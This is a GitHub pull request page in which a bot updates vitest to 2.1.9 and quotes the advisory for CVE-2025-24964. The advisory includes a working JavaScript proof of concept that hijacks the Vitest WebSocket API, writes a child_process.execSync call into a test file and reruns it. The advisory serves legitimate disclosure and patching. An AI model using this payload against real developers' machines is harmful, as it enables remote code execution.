chore(deps): update dependency vitest to v2.1.9 [security] #200

renovate · 2025-02-04T17:37:32Z

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vitest (source)	`2.1.8` -> `2.1.9`

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

Open Vitest UI.
Access a malicious web site with the script below.
If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.

// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Release Notes

vitest-dev/vitest (vitest)

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

vercel · 2025-02-04T17:37:35Z

The latest updates on your projects. Learn more about Vercel for Git ↗︎

Name	Status	Preview	Comments	Updated (UTC)
component-titles-react-component-titles-demo	✅ Ready (Inspect)	Visit Preview	💬 Add feedback	Apr 8, 2025 1:51pm
component-titles-solid-component-titles-demo	✅ Ready (Inspect)	Visit Preview	💬 Add feedback	Apr 8, 2025 1:51pm

nx-cloud · 2025-02-04T17:38:19Z

View your CI Pipeline Execution ↗ for commit 283016b.

Command	Status	Duration	Result
`nx affected -t test --parallel=3`	❌ Failed	8s	View ↗

☁️ Nx Cloud last updated this comment at 2025-04-08 13:51:52 UTC

renovate bot added the dependencies Pull requests that update a dependency file label Feb 4, 2025

vercel bot deployed to Preview – component-titles-react-component-titles-demo February 4, 2025 17:38 View deployment

vercel bot deployed to Preview – component-titles-solid-component-titles-demo February 4, 2025 17:39 View deployment

renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from f59d946 to 05739f0 Compare February 9, 2025 12:45

vercel bot deployed to Preview – component-titles-react-component-titles-demo February 9, 2025 12:48 View deployment

vercel bot deployed to Preview – component-titles-solid-component-titles-demo February 9, 2025 12:48 View deployment

renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 05739f0 to fa202f0 Compare March 3, 2025 12:14

vercel bot deployed to Preview – component-titles-solid-component-titles-demo March 3, 2025 12:17 View deployment

vercel bot deployed to Preview – component-titles-react-component-titles-demo March 3, 2025 12:18 View deployment

renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from fa202f0 to 5bd39a7 Compare March 11, 2025 11:49

vercel bot deployed to Preview – component-titles-solid-component-titles-demo March 11, 2025 11:51 View deployment

vercel bot deployed to Preview – component-titles-react-component-titles-demo March 11, 2025 11:52 View deployment

renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 5bd39a7 to 2b83772 Compare March 17, 2025 12:41

vercel bot deployed to Preview – component-titles-solid-component-titles-demo March 17, 2025 12:44 View deployment

vercel bot deployed to Preview – component-titles-react-component-titles-demo March 17, 2025 12:44 View deployment

renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 2b83772 to ab86b83 Compare April 1, 2025 12:26

vercel bot deployed to Preview – component-titles-react-component-titles-demo April 1, 2025 12:27 View deployment

vercel bot deployed to Preview – component-titles-solid-component-titles-demo April 1, 2025 12:28 View deployment

chore(deps): update dependency vitest to v2.1.9 [security]

283016b

renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from ab86b83 to 283016b Compare April 8, 2025 13:50

vercel bot deployed to Preview – component-titles-react-component-titles-demo April 8, 2025 13:50 View deployment

vercel bot deployed to Preview – component-titles-solid-component-titles-demo April 8, 2025 13:51 View deployment

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

chore(deps): update dependency vitest to v2.1.9 [security] #200

chore(deps): update dependency vitest to v2.1.9 [security] #200

Uh oh!

renovate bot commented Feb 4, 2025

Uh oh!

vercel bot commented Feb 4, 2025 •

edited

Loading

Uh oh!

nx-cloud bot commented Feb 4, 2025 •

edited

Loading

Uh oh!

Uh oh!

chore(deps): update dependency vitest to v2.1.9 [security] #200

Are you sure you want to change the base?

chore(deps): update dependency vitest to v2.1.9 [security] #200

Uh oh!

Conversation

renovate bot commented Feb 4, 2025

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Details

PoC

Impact

Release Notes

v2.1.9

🚨 Breaking Changes

🚀 Features

🐞 Bug Fixes

Configuration

Uh oh!

vercel bot commented Feb 4, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

nx-cloud bot commented Feb 4, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

Uh oh!

`v2.1.9`

vercel bot commented Feb 4, 2025 •

edited

Loading

nx-cloud bot commented Feb 4, 2025 •

edited

Loading